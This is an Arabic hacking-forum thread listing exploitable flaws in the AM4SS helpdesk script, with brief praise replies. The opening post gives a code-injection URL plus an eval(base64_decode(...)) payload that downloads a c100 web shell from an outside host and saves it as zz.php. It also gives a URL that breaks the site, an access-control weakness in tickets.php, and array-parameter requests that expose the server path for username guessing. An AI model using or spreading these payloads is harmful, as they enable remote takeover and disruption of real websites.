الوسوم:
حالة الموضوع:
مغلق
  1. Abu Abdullah

    Abu Abdullah Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    طآإلبَ
    الإقامة:
    جُ ــــده
    بسم الله الرحمن الرحيم

    السلام عليكم

    فحصت سكربت
    AM4SS

    لقيت كم ثغرة ماهي خطيره وحبيت بالمره احط باقي ثغرات السكربت في الموضوع


    طبعا كان الثغرة الاولى من اكتشاف اورنج مان
    وهي بالشكل التالي



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]ddd[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#007700]/global.[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?[/COLOR][COLOR=#0000BB]bn[/COLOR][COLOR=#007700]=[/COLOR]

    الاستغلال هتضيف هالكود بعد =


    كود:
    eval(base64_decode(JGZpbGUgPSBmb3BlbigienoucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnNoM2xsLm9yZy9jMTAwLnR4dCIpOyR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLCRzYSk7)

    وبتلقى شل بهالاسم zz.php


    الثغرة الثانيه نفس النوع بس انها تعطب الموقع



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]gg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#FF8000]//admincp/global.php?Checker=youStop();[/COLOR]

    واظن ان هالثغرتين من نفس المبرمج اضافها



    وثغرة اكسس بهالمكان طبعا الاستفاده منها يتطلب صفحة html



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]

    [​IMG]


    االحين اخطاء تتسسب باظهار مسار الموقع بيفيدني في استخراج اليوزر
    والتخمين

    تدخل ع هالمسار
    login.php
    وبعدها تضغط دخول وتشغل الاداءة مثل الصوره

    [​IMG]



    كود:
    [COLOR=#0000BB]password[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]sample[/COLOR][COLOR=#007700]%[/COLOR][COLOR=#0000BB]40w3afl[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]tst[/COLOR]

    وبعد
    /



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]




    بنفس الطريقة الا قبلها


    كود:
    [COLOR=#0000BB]message[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]20[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]subject[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]sdfdsffggrgrt[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]3[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]userfullname[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]aamaqwdsa[/COLOR]


     
  2. ҢącҜęЯ

    ҢącҜęЯ .:: <font color="#669999"><b>أستاذ مشارك</b></font Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    77
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    مكتشف ثغرات
    الإقامة:
    (KsA)
    رد: ثغرات سكربت am4ss

    بطل وربي


    واصل دون فواصل



     
  3. الحربي

    الحربي DeveloPer Plus

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    72
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Ӄ Ŵ Ť
    رد: ثغرات سكربت am4ss

    مشكور اخي واصل الى الآمام​
     
  4. THE SN!PER

    THE SN!PER <div class="smallfont"><span style="font-weight: b ExpErt DeveloPer

    الأنتساب:
    ‏2 أكتوبر 2011
    المشاركات:
    33
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    أولها T وآخرها T
    رد: ثغرات سكربت am4ss

    بارك الله فيك عزيزي بس لومكمل جميلك واضع الأداة #:"
     
  5. Numb3rs

    Numb3rs Developer

    الأنتساب:
    ‏20 يوليو 2012
    المشاركات:
    10
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: ثغرات سكربت am4ss

    جــاري التجربـة .. تقبل تحياتي
     
  6. Dr.MOT

    Dr.MOT Support - Iq-Team

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    650
    الإعجابات المتلقاة:
    5,463
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    رد: ثغرات سكربت am4ss

    وعليكم السلام ورحمة الله وبركاته

    بالفعل موضوعك رائع ابو عبد الله وراح انزل الملف المصاب بالثغرة مع الترقيع

    موفق
     
  7. Abu Abdullah

    Abu Abdullah Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    طآإلبَ
    الإقامة:
    جُ ــــده
    رد: ثغرات سكربت am4ss

    مشكوووورين جميعا
    واتمنى الاستفادى للجميع
    )5:"​
     
  8. HASsouni

    HASsouni Developer

    الأنتساب:
    ‏31 يوليو 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ثغرات سكربت am4ss

    الله يعطيك العافيه

    على جهودك

    أأخي ​
     
  9. شنايدر العطوي

    شنايدر العطوي Developer

    الأنتساب:
    ‏10 أكتوبر 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ثغرات سكربت am4ss

    يعطيك العافيه يالغآلي &:":
     
  10. System³²

    System³² Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ثغرات سكربت am4ss

    روعهة
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة